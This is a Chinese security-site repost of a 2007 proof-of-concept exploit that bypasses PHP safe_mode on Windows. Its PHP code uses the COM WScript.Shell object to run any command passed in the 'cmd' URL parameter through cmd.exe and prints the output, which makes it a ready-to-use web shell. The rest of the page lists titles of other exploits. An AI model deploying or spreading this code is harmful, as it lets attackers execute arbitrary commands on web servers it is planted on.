首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit
来源:www.vfocus.net 作者:rgod 发布时间:2007-03-08  
<?php
   //PHP COM extensions (inconsistent Win32) safe_mode bypass
   //by rgod

    $____suntzu = new COM("WScript.Shell");
    $____suntzu->Run('c:\windows\system32\cmd.exe /c '.escapeshellarg($_GET[cmd]).' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/suntzoi.txt');
    $____suntzoi=file("suntzoi.txt");
    for ($i=0; $i<count($____suntzoi); $i++) {echo nl2br(htmlentities($____suntzoi[$i]));}

   // *quote* from the php manual:
   // There is no installation needed to use these functions; they are part of the PHP core.

   // The windows version of PHP has built in support for this extension. You do not need to load any additional extension in order to use these functions.

   // You are responsible for installing support for the various COM objects that you intend to use (such as MS Word);
   // we don't and can't bundle all of those with PHP.
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP < 4.4.5 / 5.2.1 (shmop) SS
·Adobe Reader plug-in AcroPDF.d
·PHP < 4.4.5 / 5.2.1 (shmop Fun
·PHP 4.4.6 crack_opendict() Loc
·PHP <= 5.2.1 substr_compare()
·TFTPDWIN Server 0.4.2 (UDP) De
·Winamp <= 5.12 (Crafted PLS) R
·Rediff Toolbar ActiveX Control
·Macromedia 10.1.4.20 SwDir.dll
·Snort 2.6.1.1/2.6.1.2/2.7.0 (f
·WinZip <= 10.0.7245 FileView A
·Mercury/32 Mail Server <= 4.01
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved